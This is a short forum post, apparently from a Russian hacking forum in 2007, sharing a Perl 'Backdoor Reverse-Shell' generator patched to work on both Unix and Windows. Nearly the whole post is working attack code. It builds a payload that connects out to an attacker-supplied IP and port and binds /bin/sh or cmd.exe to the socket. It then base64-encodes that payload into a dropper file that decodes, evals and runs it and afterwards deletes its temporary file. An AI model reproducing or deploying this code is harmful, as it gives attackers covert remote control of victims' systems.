08.03.2007, 19:18
|
|
Постоянный
Регистрация: 14.01.2007
Сообщений: 459
Провел на форуме:
1469995
Репутация:
589
|
|
Немного подпатчил, теперь ммультиплатформенно)
Greetz: _slider_
PHP код:
#!/usr/bin/perl
## C0d3d by slider
## Multiplatform path by helios
## Backdoor Reverse-Shell v1.3.multiplatform
## http://antichat.ru
if (@ARGV!=3)
{
print "\n" . '~' x 56 . "\n";
print "Backdoor Reverse-Shell \n\n";
print "\n" . '~' x 56 . "\n";
print "---USAGE:" .'-' x 47 ."\n\n";
print "[Parameters] : $0 IP PORT file \n";
print "[Example] : $0 127.0.0.1 9999 exploit.pl \n\n";
print '~' x 56 . "\n";
die("\n");
}
$IP=$ARGV[0];
$PORT=$ARGV[1];
$NAME=$ARGV[2];
$TEXT=
"open logg,\">expl~1.tmp\";".
"print logg \"use IO::Socket;\";".
"print logg \"use Socket; use FileHandle;\";".
"print logg \"socket(SOCKET,PF_INET,SOCK_STREAM, getprotobyname('tcp'));\";".
"print logg \"connect(SOCKET, sockaddr_in('$PORT',inet_aton('$IP')));\";".
"print logg \"SOCKET->autoflush();\";".
"print logg \"open(STDIN,'>&SOCKET');\";".
"print logg \"open(STDOUT,'>&SOCKET');\";".
"print logg \"open(STDERR,'>&SOCKET');\";".
"if(-f '/bin/sh' && -x '/bin/sh') {print logg \"exec('/bin/sh');\";}".
"else{print logg \"exec('cmd.exe');\";}".
"close logg;";
use MIME::Base64;
$encoded = encode_base64($TEXT);
print "[*] Injecting...\n";
open base64,">$NAME";
print base64 "\$payload='$encoded';";
print base64 "use MIME::Base64;";
print base64 "\$decoded = decode_base64(\$payload);";
print base64 "eval(\$decoded);";
print base64 "if (-f '/bin/sh' && -x '/bin/sh') {";
print base64 "system(\'perl expl~1.tmp &\');";
print base64 "system(\'rm -rf expl~1.tmp\');}";
print base64 "else {";
print base64 "system(\'call perl expl~1.tmp\');";
print base64 "system(\'del expl~1.tmp\');}";
close base64;
print "[*] OK...\n\n";
print "$encoded";
|
|
|